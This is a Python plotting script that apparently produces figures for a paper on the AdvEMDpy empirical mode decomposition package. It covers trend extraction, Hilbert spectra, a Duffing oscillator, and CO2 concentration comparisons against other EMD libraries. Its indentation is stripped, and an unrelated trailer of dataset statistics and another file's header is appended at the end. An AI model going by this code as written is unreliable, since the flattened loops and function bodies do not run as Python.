axs[0].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[0].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[0].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[0].set_xticklabels(['', '', '', '', '', ''])
axs[0].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), 5.5 * np.ones(101), 'k--')
axs[0].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), -5.5 * np.ones(101), 'k--')
axs[0].plot(0.95 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--')
axs[0].plot(1.55 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--', label='Zoomed region')
box_0 = axs[0].get_position()
axs[0].set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
axs[0].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[1].plot(time, time_series, label='Time series')
axs[1].plot(time, imfs_31[1, :] + imfs_31[2, :], label=textwrap.fill('Sum of IMF 1 and IMF 2 with 31 knots', 19))
axs[1].plot(time, imfs_51[2, :] + imfs_51[3, :], label=textwrap.fill('Sum of IMF 2 and IMF 3 with 51 knots', 19))
print(f'DFA fluctuation with 31 knots: {np.round(np.var(time_series - (imfs_31[1, :] + imfs_31[2, :])), 3)}')
for knot in knots_31:
axs[1].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[1].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[1].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[1].set_xticklabels(['', '', '', '', '', ''])
box_1 = axs[1].get_position()
axs[1].set_position([box_1.x0 - 0.05, box_1.y0, box_1.width * 0.85, box_1.height])
axs[1].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[1].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), 5.5 * np.ones(101), 'k--')
axs[1].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), -5.5 * np.ones(101), 'k--')
axs[1].plot(0.95 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--')
axs[1].plot(1.55 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--', label='Zoomed region')
axs[2].plot(time, time_series, label='Time series')
axs[2].plot(time, imfs_11[1, :], label='IMF 1 with 11 knots')
axs[2].plot(time, imfs_31[2, :], label='IMF 2 with 31 knots')
axs[2].plot(time, imfs_51[3, :], label='IMF 3 with 51 knots')
print(f'DFA fluctuation with 11 knots: {np.round(np.var(time_series - imfs_51[3, :]), 3)}')
for knot in knots_11:
axs[2].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[2].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[2].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[2].set_xticklabels(['$0$', r'$\pi$', r'$2\pi$', r'$3\pi$', r'$4\pi$', r'$5\pi$'])
box_2 = axs[2].get_position()
axs[2].set_position([box_2.x0 - 0.05, box_2.y0, box_2.width * 0.85, box_2.height])
axs[2].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[2].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), 5.5 * np.ones(101), 'k--')
axs[2].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), -5.5 * np.ones(101), 'k--')
axs[2].plot(0.95 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--')
axs[2].plot(1.55 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--', label='Zoomed region')
plt.savefig('jss_figures/DFA_different_trends.png')
plt.show()
# plot 6b
fig, axs = plt.subplots(3, 1)
plt.suptitle(textwrap.fill('Comparison of Trends Extracted with Different Knot Sequences Zoomed Region', 40))
plt.subplots_adjust(hspace=0.1)
axs[0].plot(time, time_series, label='Time series')
axs[0].plot(time, imfs_51[1, :] + imfs_51[2, :] + imfs_51[3, :], label=textwrap.fill('Sum of IMF 1, IMF 2, & IMF 3 with 51 knots', 21))
for knot in knots_51:
axs[0].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[0].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[0].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[0].set_xticklabels(['', '', '', '', '', ''])
box_0 = axs[0].get_position()
axs[0].set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
axs[0].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[0].set_ylim(-5.5, 5.5)
axs[0].set_xlim(0.95 * np.pi, 1.55 * np.pi)
axs[1].plot(time, time_series, label='Time series')
axs[1].plot(time, imfs_31[1, :] + imfs_31[2, :], label=textwrap.fill('Sum of IMF 1 and IMF 2 with 31 knots', 19))
axs[1].plot(time, imfs_51[2, :] + imfs_51[3, :], label=textwrap.fill('Sum of IMF 2 and IMF 3 with 51 knots', 19))
for knot in knots_31:
axs[1].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[1].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[1].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[1].set_xticklabels(['', '', '', '', '', ''])
box_1 = axs[1].get_position()
axs[1].set_position([box_1.x0 - 0.05, box_1.y0, box_1.width * 0.85, box_1.height])
axs[1].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[1].set_ylim(-5.5, 5.5)
axs[1].set_xlim(0.95 * np.pi, 1.55 * np.pi)
axs[2].plot(time, time_series, label='Time series')
axs[2].plot(time, imfs_11[1, :], label='IMF 1 with 11 knots')
axs[2].plot(time, imfs_31[2, :], label='IMF 2 with 31 knots')
axs[2].plot(time, imfs_51[3, :], label='IMF 3 with 51 knots')
for knot in knots_11:
axs[2].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[2].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[2].set_xticks([np.pi, (3 / 2) * np.pi])
axs[2].set_xticklabels([r'$\pi$', r'$\frac{3}{2}\pi$'])
box_2 = axs[2].get_position()
axs[2].set_position([box_2.x0 - 0.05, box_2.y0, box_2.width * 0.85, box_2.height])
axs[2].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[2].set_ylim(-5.5, 5.5)
axs[2].set_xlim(0.95 * np.pi, 1.55 * np.pi)
plt.savefig('jss_figures/DFA_different_trends_zoomed.png')
plt.show()
hs_ouputs = hilbert_spectrum(time, imfs_51, hts_51, ifs_51, max_frequency=12, plot=False)
# plot 6c
ax = plt.subplot(111)
figure_size = plt.gcf().get_size_inches()
factor = 0.9
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of Simple Sinusoidal Time Seres with Added Noise', 50))
x_hs, y, z = hs_ouputs
z_min, z_max = 0, np.abs(z).max()
ax.pcolormesh(x_hs, y, np.abs(z), cmap='gist_rainbow', vmin=z_min, vmax=z_max)
ax.plot(x_hs[0, :], 8 * np.ones_like(x_hs[0, :]), '--', label=r'$\omega = 8$', Linewidth=3)
ax.plot(x_hs[0, :], 4 * np.ones_like(x_hs[0, :]), '--', label=r'$\omega = 4$', Linewidth=3)
ax.plot(x_hs[0, :], 2 * np.ones_like(x_hs[0, :]), '--', label=r'$\omega = 2$', Linewidth=3)
ax.set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi])
ax.set_xticklabels(['$0$', r'$\pi$', r'$2\pi$', r'$3\pi$', r'$4\pi$'])
plt.ylabel(r'Frequency (rad.s$^{-1}$)')
plt.xlabel('Time (s)')
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0 + 0.05, box_0.width * 0.85, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/DFA_hilbert_spectrum.png')
plt.show()
# plot 6c
time = np.linspace(0, 5 * np.pi, 1001)
time_series = np.cos(time) + np.cos(5 * time)
knots = np.linspace(0, 5 * np.pi, 51)
fluc = Fluctuation(time=time, time_series=time_series)
max_unsmoothed = fluc.envelope_basis_function_approximation(knots_for_envelope=knots, extrema_type='maxima', smooth=False)
max_smoothed = fluc.envelope_basis_function_approximation(knots_for_envelope=knots, extrema_type='maxima', smooth=True)
min_unsmoothed = fluc.envelope_basis_function_approximation(knots_for_envelope=knots, extrema_type='minima', smooth=False)
min_smoothed = fluc.envelope_basis_function_approximation(knots_for_envelope=knots, extrema_type='minima', smooth=True)
util = Utility(time=time, time_series=time_series)
maxima = util.max_bool_func_1st_order_fd()
minima = util.min_bool_func_1st_order_fd()
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title(textwrap.fill('Plot Demonstrating Unsmoothed Extrema Envelopes if Schoenberg–Whitney Conditions are Not Satisfied', 50))
plt.plot(time, time_series, label='Time series', zorder=2, LineWidth=2)
plt.scatter(time[maxima], time_series[maxima], c='r', label='Maxima', zorder=10)
plt.scatter(time[minima], time_series[minima], c='b', label='Minima', zorder=10)
plt.plot(time, max_unsmoothed[0], label=textwrap.fill('Unsmoothed maxima envelope', 10), c='darkorange')
plt.plot(time, max_smoothed[0], label=textwrap.fill('Smoothed maxima envelope', 10), c='red')
plt.plot(time, min_unsmoothed[0], label=textwrap.fill('Unsmoothed minima envelope', 10), c='cyan')
plt.plot(time, min_smoothed[0], label=textwrap.fill('Smoothed minima envelope', 10), c='blue')
for knot in knots[:-1]:
plt.plot(knot * np.ones(101), np.linspace(-3.0, -2.0, 101), '--', c='grey', zorder=1)
plt.plot(knots[-1] * np.ones(101), np.linspace(-3.0, -2.0, 101), '--', c='grey', label='Knots', zorder=1)
plt.xticks((0, 1 * np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi),
(r'$0$', r'$\pi$', r'2$\pi$', r'3$\pi$', r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
plt.xlim(-0.25 * np.pi, 5.25 * np.pi)
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.84, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/Schoenberg_Whitney_Conditions.png')
plt.show()
# plot 7
a = 0.25
width = 0.2
time = np.linspace((0 + a) * np.pi, (5 - a) * np.pi, 1001)
knots = np.linspace((0 + a) * np.pi, (5 - a) * np.pi, 11)
time_series = np.cos(time) + np.cos(5 * time)
utils = emd_utils.Utility(time=time, time_series=time_series)
max_bool = utils.max_bool_func_1st_order_fd()
maxima_x = time[max_bool]
maxima_y = time_series[max_bool]
min_bool = utils.min_bool_func_1st_order_fd()
minima_x = time[min_bool]
minima_y = time_series[min_bool]
inflection_bool = utils.inflection_point()
inflection_x = time[inflection_bool]
inflection_y = time_series[inflection_bool]
fluctuation = emd_mean.Fluctuation(time=time, time_series=time_series)
maxima_envelope = fluctuation.envelope_basis_function_approximation(knots, 'maxima', smooth=False,
smoothing_penalty=0.2, edge_effect='none',
spline_method='b_spline')[0]
maxima_envelope_smooth = fluctuation.envelope_basis_function_approximation(knots, 'maxima', smooth=True,
smoothing_penalty=0.2, edge_effect='none',
spline_method='b_spline')[0]
minima_envelope = fluctuation.envelope_basis_function_approximation(knots, 'minima', smooth=False,
smoothing_penalty=0.2, edge_effect='none',
spline_method='b_spline')[0]
minima_envelope_smooth = fluctuation.envelope_basis_function_approximation(knots, 'minima', smooth=True,
smoothing_penalty=0.2, edge_effect='none',
spline_method='b_spline')[0]
inflection_points_envelope = fluctuation.direct_detrended_fluctuation_estimation(knots,
smooth=True,
smoothing_penalty=0.2,
technique='inflection_points')[0]
binomial_points_envelope = fluctuation.direct_detrended_fluctuation_estimation(knots,
smooth=True,
smoothing_penalty=0.2,
technique='binomial_average', order=21,
increment=20)[0]
derivative_of_lsq = utils.derivative_forward_diff()
derivative_time = time[:-1]
derivative_knots = np.linspace(knots[0], knots[-1], 31)
# change (1) detrended_fluctuation_technique and (2) max_internal_iter and (3) debug (confusing with external debugging)
emd = AdvEMDpy.EMD(time=derivative_time, time_series=derivative_of_lsq)
imf_1_of_derivative = emd.empirical_mode_decomposition(knots=derivative_knots,
knot_time=derivative_time, text=False, verbose=False)[0][1, :]
utils = emd_utils.Utility(time=time[:-1], time_series=imf_1_of_derivative)
optimal_maxima = np.r_[False, utils.derivative_forward_diff() < 0, False] & \
np.r_[utils.zero_crossing() == 1, False]
optimal_minima = np.r_[False, utils.derivative_forward_diff() > 0, False] & \
np.r_[utils.zero_crossing() == 1, False]
EEMD_maxima_envelope = fluctuation.envelope_basis_function_approximation_fixed_points(knots, 'maxima',
optimal_maxima,
optimal_minima,
smooth=False,
smoothing_penalty=0.2,
edge_effect='none')[0]
EEMD_minima_envelope = fluctuation.envelope_basis_function_approximation_fixed_points(knots, 'minima',
optimal_maxima,
optimal_minima,
smooth=False,
smoothing_penalty=0.2,
edge_effect='none')[0]
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title('Detrended Fluctuation Analysis Examples')
plt.plot(time, time_series, LineWidth=2, label='Time series')
plt.scatter(maxima_x, maxima_y, c='r', zorder=4, label='Maxima')
plt.scatter(minima_x, minima_y, c='b', zorder=4, label='Minima')
plt.scatter(time[optimal_maxima], time_series[optimal_maxima], c='darkred', zorder=4,
label=textwrap.fill('Optimal maxima', 10))
plt.scatter(time[optimal_minima], time_series[optimal_minima], c='darkblue', zorder=4,
label=textwrap.fill('Optimal minima', 10))
plt.scatter(inflection_x, inflection_y, c='magenta', zorder=4, label=textwrap.fill('Inflection points', 10))
plt.plot(time, maxima_envelope, c='darkblue', label=textwrap.fill('EMD envelope', 10))
plt.plot(time, minima_envelope, c='darkblue')
plt.plot(time, (maxima_envelope + minima_envelope) / 2, c='darkblue')
plt.plot(time, maxima_envelope_smooth, c='darkred', label=textwrap.fill('SEMD envelope', 10))
plt.plot(time, minima_envelope_smooth, c='darkred')
plt.plot(time, (maxima_envelope_smooth + minima_envelope_smooth) / 2, c='darkred')
plt.plot(time, EEMD_maxima_envelope, c='darkgreen', label=textwrap.fill('EEMD envelope', 10))
plt.plot(time, EEMD_minima_envelope, c='darkgreen')
plt.plot(time, (EEMD_maxima_envelope + EEMD_minima_envelope) / 2, c='darkgreen')
plt.plot(time, inflection_points_envelope, c='darkorange', label=textwrap.fill('Inflection point envelope', 10))
plt.plot(time, binomial_points_envelope, c='deeppink', label=textwrap.fill('Binomial average envelope', 10))
plt.plot(time, np.cos(time), c='black', label='True mean')
plt.xticks((0, 1 * np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi), (r'$0$', r'$\pi$', r'2$\pi$', r'3$\pi$',
r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
plt.xlim(-0.25 * np.pi, 5.25 * np.pi)
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.84, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/detrended_fluctuation_analysis.png')
plt.show()
# Duffing Equation Example
def duffing_equation(xy, ts):
gamma = 0.1
epsilon = 1
omega = ((2 * np.pi) / 25)
return [xy[1], xy[0] - epsilon * xy[0] ** 3 + gamma * np.cos(omega * ts)]
t = np.linspace(0, 150, 1501)
XY0 = [1, 1]
solution = odeint(duffing_equation, XY0, t)
x = solution[:, 0]
dxdt = solution[:, 1]
x_points = [0, 50, 100, 150]
x_names = {0, 50, 100, 150}
y_points_1 = [-2, 0, 2]
y_points_2 = [-1, 0, 1]
fig, axs = plt.subplots(2, 1)
plt.subplots_adjust(hspace=0.2)
axs[0].plot(t, x)
axs[0].set_title('Duffing Equation Displacement')
axs[0].set_ylim([-2, 2])
axs[0].set_xlim([0, 150])
axs[1].plot(t, dxdt)
axs[1].set_title('Duffing Equation Velocity')
axs[1].set_ylim([-1.5, 1.5])
axs[1].set_xlim([0, 150])
axis = 0
for ax in axs.flat:
ax.label_outer()
if axis == 0:
ax.set_ylabel('x(t)')
ax.set_yticks(y_points_1)
if axis == 1:
ax.set_ylabel(r'$ \dfrac{dx(t)}{dt} $')
ax.set(xlabel='t')
ax.set_yticks(y_points_2)
ax.set_xticks(x_points)
ax.set_xticklabels(x_names)
axis += 1
plt.savefig('jss_figures/Duffing_equation.png')
plt.show()
# compare other packages Duffing - top
pyemd = pyemd0215()
py_emd = pyemd(x)
IP, IF, IA = emd040.spectra.frequency_transform(py_emd.T, 10, 'hilbert')
freq_edges, freq_bins = emd040.spectra.define_hist_bins(0, 0.2, 100)
hht = emd040.spectra.hilberthuang(IF, IA, freq_edges)
hht = gaussian_filter(hht, sigma=1)
ax = plt.subplot(111)
figure_size = plt.gcf().get_size_inches()
factor = 1.0
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of Duffing Equation using PyEMD 0.2.10', 40))
plt.pcolormesh(t, freq_bins, hht, cmap='gist_rainbow', vmin=0, vmax=np.max(np.max(np.abs(hht))))
plt.plot(t[:-1], 0.124 * np.ones_like(t[:-1]), '--', label=textwrap.fill('Hamiltonian frequency approximation', 15))
plt.plot(t[:-1], 0.04 * np.ones_like(t[:-1]), 'g--', label=textwrap.fill('Driving function frequency', 15))
plt.xticks([0, 50, 100, 150])
plt.yticks([0, 0.1, 0.2])
plt.ylabel('Frequency (Hz)')
plt.xlabel('Time (s)')
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0 + 0.05, box_0.width * 0.75, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/Duffing_equation_ht_pyemd.png')
plt.show()
plt.show()
emd_sift = emd040.sift.sift(x)
IP, IF, IA = emd040.spectra.frequency_transform(emd_sift, 10, 'hilbert')
freq_edges, freq_bins = emd040.spectra.define_hist_bins(0, 0.2, 100)
hht = emd040.spectra.hilberthuang(IF, IA, freq_edges)
hht = gaussian_filter(hht, sigma=1)
ax = plt.subplot(111)
figure_size = plt.gcf().get_size_inches()
factor = 1.0
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of Duffing Equation using emd 0.3.3', 40))
plt.pcolormesh(t, freq_bins, hht, cmap='gist_rainbow', vmin=0, vmax=np.max(np.max(np.abs(hht))))
plt.plot(t[:-1], 0.124 * np.ones_like(t[:-1]), '--', label=textwrap.fill('Hamiltonian frequency approximation', 15))
plt.plot(t[:-1], 0.04 * np.ones_like(t[:-1]), 'g--', label=textwrap.fill('Driving function frequency', 15))
plt.xticks([0, 50, 100, 150])
plt.yticks([0, 0.1, 0.2])
plt.ylabel('Frequency (Hz)')
plt.xlabel('Time (s)')
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0 + 0.05, box_0.width * 0.75, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/Duffing_equation_ht_emd.png')
plt.show()
# compare other packages Duffing - bottom
emd_duffing = AdvEMDpy.EMD(time=t, time_series=x)
emd_duff, emd_ht_duff, emd_if_duff, _, _, _, _ = emd_duffing.empirical_mode_decomposition(verbose=False)
fig, axs = plt.subplots(2, 1)
plt.subplots_adjust(hspace=0.3)
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
axs[0].plot(t, emd_duff[1, :], label='AdvEMDpy')
axs[0].plot(t, py_emd[0, :], '--', label='PyEMD 0.2.10')
axs[0].plot(t, emd_sift[:, 0], '--', label='emd 0.3.3')
axs[0].set_title('IMF 1')
axs[0].set_ylim([-2, 2])
axs[0].set_xlim([0, 150])
axs[1].plot(t, emd_duff[2, :], label='AdvEMDpy')
print(f'AdvEMDpy driving function error: {np.round(sum(abs(0.1 * np.cos(0.04 * 2 * np.pi * t) - emd_duff[2, :])), 3)}')
axs[1].plot(t, py_emd[1, :], '--', label='PyEMD 0.2.10')
print(f'PyEMD driving function error: {np.round(sum(abs(0.1 * np.cos(0.04 * 2 * np.pi * t) - py_emd[1, :])), 3)}')
axs[1].plot(t, emd_sift[:, 1], '--', label='emd 0.3.3')
print(f'emd driving function error: {np.round(sum(abs(0.1 * np.cos(0.04 * 2 * np.pi * t) - emd_sift[:, 1])), 3)}')
axs[1].plot(t, 0.1 * np.cos(0.04 * 2 * np.pi * t), '--', label=r'$0.1$cos$(0.08{\pi}t)$')
axs[1].set_title('IMF 2')
axs[1].set_ylim([-0.2, 0.4])
axs[1].set_xlim([0, 150])
axis = 0
for ax in axs.flat:
ax.label_outer()
if axis == 0:
ax.set_ylabel(r'$\gamma_1(t)$')
ax.set_yticks([-2, 0, 2])
if axis == 1:
ax.set_ylabel(r'$\gamma_2(t)$')
ax.set_yticks([-0.2, 0, 0.2])
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0, box_0.width * 0.85, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
ax.set_xticks(x_points)
ax.set_xticklabels(x_names)
axis += 1
plt.savefig('jss_figures/Duffing_equation_imfs.png')
plt.show()
hs_ouputs = hilbert_spectrum(t, emd_duff, emd_ht_duff, emd_if_duff, max_frequency=1.3, plot=False)
ax = plt.subplot(111)
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of Duffing Equation using AdvEMDpy', 40))
x, y, z = hs_ouputs
y = y / (2 * np.pi)
z_min, z_max = 0, np.abs(z).max()
figure_size = plt.gcf().get_size_inches()
factor = 1.0
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
ax.pcolormesh(x, y, np.abs(z), cmap='gist_rainbow', vmin=z_min, vmax=z_max)
plt.plot(t[:-1], 0.124 * np.ones_like(t[:-1]), '--', label=textwrap.fill('Hamiltonian frequency approximation', 15))
plt.plot(t[:-1], 0.04 * np.ones_like(t[:-1]), 'g--', label=textwrap.fill('Driving function frequency', 15))
plt.xticks([0, 50, 100, 150])
plt.yticks([0, 0.1, 0.2])
plt.ylabel('Frequency (Hz)')
plt.xlabel('Time (s)')
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0 + 0.05, box_0.width * 0.75, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/Duffing_equation_ht.png')
plt.show()
# Carbon Dioxide Concentration Example
CO2_data = pd.read_csv('Data/co2_mm_mlo.csv', header=51)
plt.plot(CO2_data['month'], CO2_data['decimal date'])
plt.title(textwrap.fill('Mean Monthly Concentration of Carbon Dioxide in the Atmosphere', 35))
plt.ylabel('Parts per million')
plt.xlabel('Time (years)')
plt.savefig('jss_figures/CO2_concentration.png')
plt.show()
signal = CO2_data['decimal date']
signal = np.asarray(signal)
time = CO2_data['month']
time = np.asarray(time)
# compare other packages Carbon Dioxide - top
pyemd = pyemd0215()
py_emd = pyemd(signal)
IP, IF, IA = emd040.spectra.frequency_transform(py_emd[:2, :].T, 12, 'hilbert')
print(f'PyEMD annual frequency error: {np.round(sum(np.abs(IF[:, 0] - np.ones_like(IF[:, 0]))), 3)}')
freq_edges, freq_bins = emd040.spectra.define_hist_bins(0, 2, 100)
hht = emd040.spectra.hilberthuang(IF, IA, freq_edges)
hht = gaussian_filter(hht, sigma=1)
fig, ax = plt.subplots()
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of CO$_{2}$ Concentration using PyEMD 0.2.10', 45))
plt.ylabel('Frequency (year$^{-1}$)')
plt.xlabel('Time (years)')
plt.pcolormesh(time, freq_bins, hht, cmap='gist_rainbow', vmin=0, vmax=np.max(np.max(np.abs(hht))))
plt.plot(time, np.ones_like(time), 'k--', label=textwrap.fill('Annual cycle', 10))
box_0 = ax.get_position()
ax.set_position([box_0.x0 + 0.0125, box_0.y0 + 0.075, box_0.width * 0.8, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/CO2_Hilbert_pyemd.png')
plt.show()
emd_sift = emd040.sift.sift(signal)
IP, IF, IA = emd040.spectra.frequency_transform(emd_sift[:, :1], 12, 'hilbert')
print(f'emd annual frequency error: {np.round(sum(np.abs(IF - np.ones_like(IF)))[0], 3)}')
freq_edges, freq_bins = emd040.spectra.define_hist_bins(0, 2, 100)
hht = emd040.spectra.hilberthuang(IF, IA, freq_edges)
hht = gaussian_filter(hht, sigma=1)
fig, ax = plt.subplots()
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of CO$_{2}$ Concentration using emd 0.3.3', 45))
plt.ylabel('Frequency (year$^{-1}$)')
plt.xlabel('Time (years)')
plt.pcolormesh(time, freq_bins, hht, cmap='gist_rainbow', vmin=0, vmax=np.max(np.max(np.abs(hht))))
plt.plot(time, np.ones_like(time), 'k--', label=textwrap.fill('Annual cycle', 10))
box_0 = ax.get_position()
ax.set_position([box_0.x0 + 0.0125, box_0.y0 + 0.075, box_0.width * 0.8, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/CO2_Hilbert_emd.png')
plt.show()
# compare other packages Carbon Dioxide - bottom
knots = np.linspace(time[0], time[-1], 200)
emd_example = AdvEMDpy.EMD(time=time, time_series=signal)
imfs, hts, ifs, _, _, _, _ = \
emd_example.empirical_mode_decomposition(knots=knots, knot_time=time, verbose=False)
print(f'AdvEMDpy annual frequency error: {np.round(sum(np.abs(ifs[1, :] / (2 * np.pi) - np.ones_like(ifs[1, :]))), 3)}')
fig, axs = plt.subplots(2, 2)
plt.subplots_adjust(hspace=0.5)
axs[0, 0].plot(time, signal)
axs[0, 1].plot(time, signal)
axs[0, 1].plot(time, imfs[0, :], label='Smoothed')
axs[0, 1].legend(loc='lower right')
axs[1, 0].plot(time, imfs[1, :])
axs[1, 1].plot(time, imfs[2, :])
axis = 0
for ax in axs.flat:
if axis == 0:
ax.set(ylabel=R'C0$_2$ concentration')
if axis == 1:
pass
if axis == 2:
ax.set(ylabel=R'C0$_2$ concentration')
ax.set(xlabel='Time (years)')
if axis == 3:
ax.set(xlabel='Time (years)')
axis += 1
plt.gcf().subplots_adjust(bottom=0.15)
axs[0, 0].set_title(r'Original CO$_2$ Concentration')
axs[0, 1].set_title('Smoothed CO$_2$ Concentration')
axs[1, 0].set_title('IMF 1')
axs[1, 1].set_title('Residual')
plt.gcf().subplots_adjust(bottom=0.15)
plt.savefig('jss_figures/CO2_EMD.png')
plt.show()
hs_ouputs = hilbert_spectrum(time, imfs, hts, ifs, max_frequency=10, which_imfs=[1], plot=False)
x_hs, y, z = hs_ouputs
y = y / (2 * np.pi)
z_min, z_max = 0, np.abs(z).max()
fig, ax = plt.subplots()
figure_size = plt.gcf().get_size_inches()
factor = 0.7
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
ax.pcolormesh(x_hs, y, np.abs(z), cmap='gist_rainbow', vmin=z_min, vmax=z_max)
ax.set_title(textwrap.fill(r'Gaussian Filtered Hilbert Spectrum of CO$_{2}$ Concentration using AdvEMDpy', 40))
plt.ylabel('Frequency (year$^{-1}$)')
plt.xlabel('Time (years)')
plt.plot(x_hs[0, :], np.ones_like(x_hs[0, :]), 'k--', label=textwrap.fill('Annual cycle', 10))
ax.axis([x_hs.min(), x_hs.max(), y.min(), y.max()])
box_0 = ax.get_position()
ax.set_position([box_0.x0 + 0.0125, box_0.y0 + 0.075, box_0.width * 0.8, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/CO2_Hilbert.png')
plt.show()
| 48.949835 | 135 | 0.664141 | 12,802 | 74,159 | 3.621856 | 0.043196 | 0.016909 | 0.027498 | 0.012768 | 0.784416 | 0.728988 | 0.665711 | 0.613152 | 0.567192 | 0.53523 | 0 | 0.065736 | 0.149732 | 74,159 | 1,514 | 136 | 48.982166 | 0.66959 | 0.012662 | 0 | 0.425532 | 0 | 0.007092 | 0.114509 | 0.018518 | 0 | 0 | 0 | 0 | 0 | 1 | 0.000788 | false | 0.000788 | 0.016548 | 0 | 0.018125 | 0.007092 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6adeb529cfb4e14bdceab8619cd0e9f75dad5fb6
| 615 |
py
|
Python
|
migrations/versions/0158_remove_rate_limit_default.py
|
cds-snc/notifier-api
|
